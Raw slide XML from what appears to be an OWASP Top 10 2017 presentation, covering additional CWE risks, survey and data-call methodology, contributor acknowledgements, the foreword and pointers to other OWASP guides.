                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>&amp;Monitoring</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dirty="1" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Additional Risks to Consider</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dirty="1"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Some of these have appeared in previous versions of the Top 10, and others have not, including new attack techniques that are being identified all the time.</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Other important application security risks (ordered by CWE-ID) that you should additionally consider include</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="1000" baseline="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4"/>
                        </a:rPr>
                        <a:t>CWE-352:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Cross-Site Request Forgery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5"/>
                        </a:rPr>
                        <a:t>CWE-400:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>Uncontrolled Resource Consumption ('Resource Exhaustion', 'AppDoS')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6"/>
                        </a:rPr>
                        <a:t>CWE-434:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>Unrestricted Upload of File with Dangerous Type</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7"/>
                        </a:rPr>
                        <a:t>CWE-451:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>User Interface (UI) Misrepresentation of Critical Information (Clickjacking and others)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8"/>
                        </a:rPr>
                        <a:t>CWE-601:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Unvalidated Forward and Redirects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9"/>
                        </a:rPr>
                        <a:t>CWE-799:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Improper Control of Interaction Frequency (Anti-Automation)</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0"/>
                        </a:rPr>
                        <a:t>CWE-829:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Inclusion of Functionality from Untrusted Control Sphere (3rd Party Content)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1"/>
                        </a:rPr>
                        <a:t>CWE-918:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>Server-Side Request Forgery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Prevalence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3897232" y="2627763"/>
            <a:ext cx="903369"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Detectability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1759009" y="2627763"/>
            <a:ext cx="956796"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Exploitability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4952356" y="2627763"/>
            <a:ext cx="869908"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Technical</a:t>
            </a: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dirty="1" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Security</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="ru-RU" dirty="1" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="ru-RU" dirty="1" sz="900" b="1">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dirty="1" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Attack</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="ru-RU" dirty="1" sz="900" b="1">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dirty="1" sz="900" b="1">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Business</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+RF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titel 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Details About Risk Factors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dirty="1" sz="1600" b="1">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noProof="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put them into a ranked survey and asked respondents to rank the top four vulnerabilities that they felt should be included in the OWASP Top 10 - 2017.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survey was open from</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Aug 2 – Sep 18,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Cryptographic Failures can fit within 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Insecure deserialization was ranked at number three, so it was added to the Top 10 as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after risk rating.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fourth ranked User-Controlled Key is included in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number five ranked category in the survey is Insufficient Logging and Monitoring, which we believe is a good fit for the Top 10 list, which is why it has become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have moved to a point where applications need to be able to define what may be an attack and generate appropriate logging, alerting, escalation and response.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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Public Data Call</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is well known, tools traditionally report all instances found of a vulnerability and humans traditionally report a single finding with a number of examples.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data from many larger contributors was provided in two views.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first was the traditional frequency style of counting every instance found of a vulnerability, while the second was the count of applications in which each vulnerability was found in (one or more times).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While not perfect, this reasonably allows us to compare the data from Human Assisted Tools and Tool Assisted Humans.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raw data and analysis work is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used a one-year block of time where possible and identified by the contributor.</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majority of applications are unique, though we acknowledge the likelihood of some repeat applications between the yearly data from Veracode.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23 data sets used were either identified as tool assisted human testing or specifically provided incidence rate from human assisted tools.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Anomalies in the selected data of 100%+ incidence were adjusted down to 100% max. To calculate the incidence rate, we calculated the percentage of the total applications there were found to contain each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ranking of incidence was used for the prevalence calculation in the overall risk for ranking the Top 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dirty="1" sz="3500"/>
              <a:t>+DAT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1">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Rank</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Survey Vulnerability Categories</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Score</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sz="3500"/>
              <a:t>+ACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1">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dirty="1" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Acknowledgements to Data Contributors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many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ru-RU" dirty="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1" rtl="0">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rtl="0">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dirty="1" sz="950" u="none" baseline="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ru-RU" dirty="1" sz="950" u="none" baseline="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ru-RU" dirty="1" sz="950" u="none" baseline="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kumimoji="0" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:uLnTx/>
                          <a:uFillTx/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Acknowledgements to Individual Contributors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i="0" strike="noStrike"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ru-RU" dirty="1" baseline="0" sz="950" u="none">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950" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>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sz="950" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>We would be remiss not to mention that Dirk Wetter, Jim Manico, and Osama Elnaggar have provided extensive assistance.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="0" sz="950" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="0" sz="950" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Also, Chris Frohoff and Gabriel Lawrence provided invaluable support in the writing of the new </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="1" sz="950" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017-Insecure Deserialization risk</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="0" sz="950" i="0" u="none" strike="noStrike">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AsTech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ContextIS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Easybss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Edgescan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iBLISS Seguran̤a &amp; Intelig̻encia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ITsec Security Services bv</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Khallagh</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 Limacher IT Dienstleistungen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Osampa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Purpletalk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dirty="1" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Foreword</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dirty="1" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Insecure software is undermining our financial, healthcare, defense, energy, and other critical infrastructure.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As our software becomes increasingly complex, and connected, the difficulty of achieving application security increases exponentially.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rapid pace of modern software development processes makes the most common risks essential to discover and resolve quickly and accurately.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can no longer afford to tolerate relatively simple security problems like those presented in this OWASP Top 10.</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This shows how much passion the community has for the OWASP Top 10, and thus how critical it is for OWASP to get the Top 10 right for the majority of use cases.</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ru-RU" dirty="1" i="1" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>the</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> de facto application security standard.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </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encourage large and high performing organizations to use the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Application Security Verification Standard (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1"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ru-RU" dirty="1" b="1" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>What’s Next for Developers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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>What’s Next for Security Testers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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>What’s Next for Organizations</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, which is suitable for CIOs and CISOs, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="1" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>What’s Next for Application Managers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1"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programs come in all shapes and sizes.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Leverage your organization's existing strengths to measure and improve your application security program using the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Software Assurance Maturity Model</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</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hope that the OWASP Top 10 is useful to your application security efforts.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don't hesitate to contact OWASP with your questions, comments, and ideas at our GitHub project repository:</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ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Neil Smithlin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="95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1600" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Спонсоры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Благодарим компанию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OWASP - 2017.</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Организации и физические лица, предоставившие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FW</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Foreword</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ru-RU" dirty="1" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>- </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and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ru-RU" dirty="1" b="0" sz="950" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</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Two key differentiators from previous OWASP Top 10 releases are the substantial community feedback and extensive data assembled from dozens of organizations, possibly the largest amount of data ever assembled in the preparation of an application security standard.</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provides us with confidence that the new OWASP Top 10 addresses the most impactful application security risks currently facing organizations.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ru-RU" dirty="1" baseline="0" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> completed by over 500 individuals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This data spans vulnerabilities gathered from hundreds of organizations and over 100,000 real-world applications and APIs.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items are selected and prioritized according to this prevalence data, in combination with consensus estimates of exploitability, detectability, and impact.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provides basic techniques to protect against these high risk problem areas, and provides guidance on where to go from here.</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Roadmap for future activities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Don't stop at 10</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There are hundreds of issues that could affect the overall security of a web application as discussed in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP Developer's Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> and the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Cheat Sheet Series</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are essential reading for anyone developing web applications and APIs.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Guidance on how to effectively find vulnerabilities in web applications and APIs is provided in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>OWASP Testing Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" baseline="0" sz="95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Constant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" baseline="0" b="1" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> change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OWASP Top 10 will continue to change.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Even without changing a single line of your application's code, you may become vulnerable as new flaws are discovered and attack methods are refined.</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review the advice at the end of the Top 10 in What's Next For </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Developers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0" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Security Testers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1" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Organizations</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950">
                          <a:latin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cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId12" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Application Managers </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1"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baseline="0" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Think positive</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ru-RU" dirty="1" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>OWASP Proactive Controls </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1"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ru-RU" dirty="1" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>OWASP Application Security Verification Standard (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> is a guide for organizations and application reviewers on what to verify.</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Use tools wisely</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Security vulnerabilities can be quite complex and deeply buried in code.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In many cases, the most cost-effective approach for finding and eliminating these weaknesses is human experts armed with advanced tools.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ru-RU" dirty="1" b="1" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Push left, right, and everywhere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Focus on making security an integral part of your culture throughout your development organization.</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Find out more in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>OWASP Software Assurance Maturity Model (SAMM)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="95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Attribution</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We'd like to thank the organizations that contributed their vulnerability data to support the 2017 update.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received more than 40 responses to the call for data.</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For the first time, all the data contributed to a Top 10 release, and the full list of contributors is publicly available.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believe this is one of the larger, more diverse collections of vulnerability data ever publicly collected.</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As there are more contributors than space here, we have created a </a:t>
